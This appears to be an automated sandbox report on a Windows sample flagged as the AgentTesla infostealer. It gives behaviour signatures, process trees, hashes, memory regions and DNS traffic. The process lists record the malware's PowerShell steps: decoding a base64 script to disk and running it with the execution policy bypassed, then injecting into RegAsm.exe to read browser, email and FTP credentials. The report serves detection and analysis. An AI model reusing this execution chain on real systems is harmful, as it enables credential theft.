Analysis Overview
SHA256
664b37245df07f80723d2a014fd31e77b3ee06074d1eda962c167aacaa9d9bc3
Threat Level: Known bad
The file fwuvzd.exe was found to be: Known bad.
Malicious Activity Summary
AgentTesla
Checks computer location settings
Reads WinSCP keys stored on the system
Reads data files stored by FTP clients
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Suspicious use of SetThreadContext
Unsigned PE
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Suspicious use of SetWindowsHookEx
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-04-03 11:48
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-04-03 11:47
Reported
2024-04-03 11:50
Platform
win7-20240221-en
Max time kernel
117s
Max time network
121s
Command Line
Signatures
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\fwuvzd.exe
"C:\Users\Admin\AppData\Local\Temp\fwuvzd.exe"
C:\Windows\SysWOW64\wscript.exe
"wscript.exe" "C:\Users\Admin\start.vbs"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\temp.bat" "
C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('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')) | Out-File -FilePath 'C:\Users\Admin\-temp.ps1' -Encoding UTF8"
C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\-temp.ps1"
Network
Files
C:\Users\Admin\start.vbs
| MD5 | abe1dd23ab4c11aae54f1898c780c0b5 |
| SHA1 | bb2f974b3e0af2baa40920b475582bfd4fb28001 |
| SHA256 | 89054e19532a9a62ca3403a8899495bf6f06557ff886b475a04227eb8aba7b12 |
| SHA512 | e9ec437a32301078ea69ce2f36dadab68315d5e56d94c4d579d3409ccbe0c9e00c3aed7baa0fa6d656fb8ed23213f4c01fb2d108c1a0ed11c58c76cd00f9a99d |
C:\Users\Admin\temp.bat
| MD5 | 58b55cc56434f24c5dfff90a59c34b35 |
| SHA1 | 39583e91e02cd52ef110b9bdab9bd974316db642 |
| SHA256 | 5639b5fd5b7647b3cf2a043984f7ed3f3ceb1471db67d697fa6c3a84c5a33bf9 |
| SHA512 | 8f8a6c44cdf30cbd6a1afed453a0ff1e2487042b2c45832f6aa25469585d097431c91c13598d8bf13f36b03805ebffb665b58ccb0f42859c1c2691fe33dd0be2 |
memory/2588-8-0x00000000744D0000-0x0000000074A7B000-memory.dmp
memory/2588-9-0x00000000744D0000-0x0000000074A7B000-memory.dmp
memory/2588-10-0x0000000002810000-0x0000000002850000-memory.dmp
memory/2588-11-0x0000000002810000-0x0000000002850000-memory.dmp
memory/2588-13-0x00000000744D0000-0x0000000074A7B000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | 0db58e9c618a317cca323cfcda030bad |
| SHA1 | f9b78821e914eb5955c78809ed2e95ac27be264d |
| SHA256 | fc59039baf53a8bcd0616ef3f218ff686bd8a860ca4c488489efa3ed79c80c41 |
| SHA512 | b78178d0f52a84be0d4f72a67f0265288242a5c43f6f0847ee1db2696226c76d8b412f3527dc04a28af9262a7ce2be628a6802678f4cf070a70fdc7304fc9992 |
memory/2560-20-0x0000000002840000-0x0000000002880000-memory.dmp
memory/2560-19-0x0000000074490000-0x0000000074A3B000-memory.dmp
C:\Users\Admin\-temp.ps1
| MD5 | c85cd2f6e6462d17628dfbc45bbefc50 |
| SHA1 | bdfe72dcd76c67404719fd653c90600065bd7c95 |
| SHA256 | 09cf28610815212a352b962f37ef96d67e43484d132bd845f9b150ceab8ca190 |
| SHA512 | 564df0161752ed2149f9a5923153d06357544234691876fc61bbc781a6b33a871dbc571dfa0d462e935ef405bb2c1857a7ea17d1fb33ce703d165df2ec342a05 |
memory/2560-22-0x0000000074490000-0x0000000074A3B000-memory.dmp
memory/2560-23-0x0000000074490000-0x0000000074A3B000-memory.dmp
memory/2560-24-0x0000000002840000-0x0000000002880000-memory.dmp
memory/2560-26-0x0000000074490000-0x0000000074A3B000-memory.dmp
memory/2560-27-0x0000000002840000-0x0000000002880000-memory.dmp
memory/2560-28-0x0000000074490000-0x0000000074A3B000-memory.dmp
memory/2560-29-0x0000000074490000-0x0000000074A3B000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-04-03 11:47
Reported
2024-04-03 11:50
Platform
win10v2004-20240226-en
Max time kernel
148s
Max time network
156s
Command Line
Signatures
AgentTesla
Checks computer location settings
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key value queried | \REGISTRY\USER\S-1-5-21-609813121-2907144057-1731107329-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\wscript.exe | N/A |
Reads WinSCP keys stored on the system
Reads data files stored by FTP clients
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| PID 1956 set thread context of 4108 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\fwuvzd.exe
"C:\Users\Admin\AppData\Local\Temp\fwuvzd.exe"
C:\Windows\SysWOW64\wscript.exe
"wscript.exe" "C:\Users\Admin\start.vbs"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\temp.bat" "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('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')) | Out-File -FilePath 'C:\Users\Admin\-temp.ps1' -Encoding UTF8"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\-temp.ps1"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.177.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.66.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\start.vbs
| MD5 | abe1dd23ab4c11aae54f1898c780c0b5 |
| SHA1 | bb2f974b3e0af2baa40920b475582bfd4fb28001 |
| SHA256 | 89054e19532a9a62ca3403a8899495bf6f06557ff886b475a04227eb8aba7b12 |
| SHA512 | e9ec437a32301078ea69ce2f36dadab68315d5e56d94c4d579d3409ccbe0c9e00c3aed7baa0fa6d656fb8ed23213f4c01fb2d108c1a0ed11c58c76cd00f9a99d |
C:\Users\Admin\temp.bat
| MD5 | 58b55cc56434f24c5dfff90a59c34b35 |
| SHA1 | 39583e91e02cd52ef110b9bdab9bd974316db642 |
| SHA256 | 5639b5fd5b7647b3cf2a043984f7ed3f3ceb1471db67d697fa6c3a84c5a33bf9 |
| SHA512 | 8f8a6c44cdf30cbd6a1afed453a0ff1e2487042b2c45832f6aa25469585d097431c91c13598d8bf13f36b03805ebffb665b58ccb0f42859c1c2691fe33dd0be2 |
memory/1840-7-0x00000000751C0000-0x0000000075970000-memory.dmp
memory/1840-6-0x0000000005220000-0x0000000005256000-memory.dmp
memory/1840-8-0x0000000005210000-0x0000000005220000-memory.dmp
memory/1840-9-0x0000000005890000-0x0000000005EB8000-memory.dmp
memory/1840-10-0x00000000057E0000-0x0000000005802000-memory.dmp
memory/1840-11-0x0000000005EC0000-0x0000000005F26000-memory.dmp
memory/1840-12-0x0000000005F30000-0x0000000005F96000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_the4n1ne.s1d.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1840-18-0x0000000006030000-0x0000000006384000-memory.dmp
memory/1840-23-0x00000000065F0000-0x000000000660E000-memory.dmp
memory/1840-24-0x0000000006680000-0x00000000066CC000-memory.dmp
memory/1840-25-0x0000000005210000-0x0000000005220000-memory.dmp
memory/1840-26-0x0000000007F20000-0x000000000859A000-memory.dmp
memory/1840-27-0x0000000006B00000-0x0000000006B1A000-memory.dmp
memory/1840-31-0x00000000751C0000-0x0000000075970000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 4280e36a29fa31c01e4d8b2ba726a0d8 |
| SHA1 | c485c2c9ce0a99747b18d899b71dfa9a64dabe32 |
| SHA256 | e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359 |
| SHA512 | 494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4 |
memory/1956-33-0x00000000751C0000-0x0000000075970000-memory.dmp
memory/1956-34-0x0000000002510000-0x0000000002520000-memory.dmp
memory/1956-35-0x0000000002510000-0x0000000002520000-memory.dmp
memory/1956-45-0x0000000005680000-0x00000000059D4000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 8f53a97ba9a300b341468a765ceecb53 |
| SHA1 | 5c72d2fe43491f8889bd59777f247259137cbcca |
| SHA256 | cb6550fec63c4473e2791c3ad1c1c03f742eedf53af658f04bf4e58afaa3cc8e |
| SHA512 | 1ce8669715cfefcd9152b83016dd35df178c4daf8e1e330892e3188fa2b8434ceb474a8d4496eb03936816361e1fa5b493deead2f032f1801a630fdda678fd09 |
C:\Users\Admin\-temp.ps1
| MD5 | c85cd2f6e6462d17628dfbc45bbefc50 |
| SHA1 | bdfe72dcd76c67404719fd653c90600065bd7c95 |
| SHA256 | 09cf28610815212a352b962f37ef96d67e43484d132bd845f9b150ceab8ca190 |
| SHA512 | 564df0161752ed2149f9a5923153d06357544234691876fc61bbc781a6b33a871dbc571dfa0d462e935ef405bb2c1857a7ea17d1fb33ce703d165df2ec342a05 |
memory/1956-48-0x0000000002510000-0x0000000002520000-memory.dmp
memory/1956-49-0x0000000006E00000-0x0000000006E96000-memory.dmp
memory/1956-50-0x0000000006DD0000-0x0000000006DF2000-memory.dmp
memory/1956-51-0x00000000074E0000-0x0000000007A84000-memory.dmp
memory/1956-53-0x0000000006FB0000-0x0000000007022000-memory.dmp
memory/1956-54-0x0000000000DE0000-0x0000000000DEA000-memory.dmp
memory/1956-55-0x0000000077C21000-0x0000000077D41000-memory.dmp
memory/4108-56-0x0000000000400000-0x0000000000442000-memory.dmp
memory/4108-58-0x00000000751C0000-0x0000000075970000-memory.dmp
memory/4108-59-0x0000000005070000-0x0000000005080000-memory.dmp
memory/1956-60-0x00000000751C0000-0x0000000075970000-memory.dmp
memory/4108-61-0x0000000005F60000-0x0000000005FB0000-memory.dmp
memory/4108-62-0x0000000006050000-0x00000000060E2000-memory.dmp
memory/4108-63-0x0000000006220000-0x000000000622A000-memory.dmp
memory/4108-64-0x00000000751C0000-0x0000000075970000-memory.dmp
memory/4108-65-0x0000000005070000-0x0000000005080000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-04-03 11:47
Reported
2024-04-03 11:48
Platform
win7-20240221-en
Command Line
Signatures
Processes
Network
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-04-03 11:47
Reported
2024-04-03 11:48
Platform
win10v2004-20240226-en
Command Line
Signatures
Processes
Network
Files
Analysis: behavioral5
Detonation Overview
Submitted
2024-04-03 11:47
Reported
2024-04-03 11:48
Platform
win7-20240221-en
Command Line
Signatures
Processes
Network
Files
Analysis: behavioral6
Detonation Overview
Submitted
2024-04-03 11:47
Reported
2024-04-03 11:48
Platform
win10v2004-20231215-en